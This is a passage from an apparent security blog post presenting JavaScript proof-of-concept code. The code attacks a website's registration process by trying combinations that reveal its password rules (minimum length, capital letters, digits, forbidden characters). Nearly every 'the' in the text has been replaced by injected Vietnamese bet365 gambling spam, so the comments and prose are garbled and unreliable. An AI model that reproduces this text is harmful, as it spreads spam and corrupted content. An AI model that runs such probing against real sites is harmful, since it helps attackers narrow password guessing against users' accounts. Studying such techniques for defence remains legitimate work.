attack_div.innerHTML += 'Last letter has to be a digit : true
';
}


/********

Function run_attack()

This function is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 starting point of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 attack. This function is called after cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 successful registration in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 beginning and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n onwards tries different combinations to identify what characters are not allowed in a password.

********/


function run_attack()
{
//Find cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 minimum character required for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 password.
findMinChars();

//Find if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 password has to start with a capital letter.
isStartingWithCapitalLetter();

//Find if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 digits are required
isDigitRequired();

//Find if it has to end with a digit.
isEndingWithDigit();

//Find if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 characters as mentioned in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 chars_to_check String are not allowed.
findCharsNotAllowed();

}


/********

String.prototype.replaceAll

This function replaces all instances of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 given substring with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 target string. This function was copied from Ask Ben website. Details of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 function is provided on his website in case you want to understand. The url is mentioned below
http://www.bennadel.com/blog/142-Ask-Ben-Javascript-String-Replace-Method.htm

********/

String.prototype.replaceAll = function(
strTarget, // The substring you want to replace
strSubString // The string you want to replace in.
)
{
var strText = this;
var intIndexOfMatch = strText.indexOf( strTarget );

// Keep looping while an instance of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 target string still exists in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 string.
while (intIndexOfMatch != -1)
{

// Relace out cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 current instance.
strText = strText.replace( strTarget, strSubString )

// Get cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 index of any next matching substring.
intIndexOfMatch = strText.indexOf( strTarget );
}

// Return cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 updated string with ALL cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 target strings replaced out with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 new substring.
return( strText );
}

-----End Code ----

There are many improvements that can be done to this program. This is just a proof of concept and I was too lazy to do too much. If you get a chance to improve upon this, please do let me know. I also have some ideas and maybe we can discuss about it.

Download cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 complete source code or view cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 working demo at Attack Labs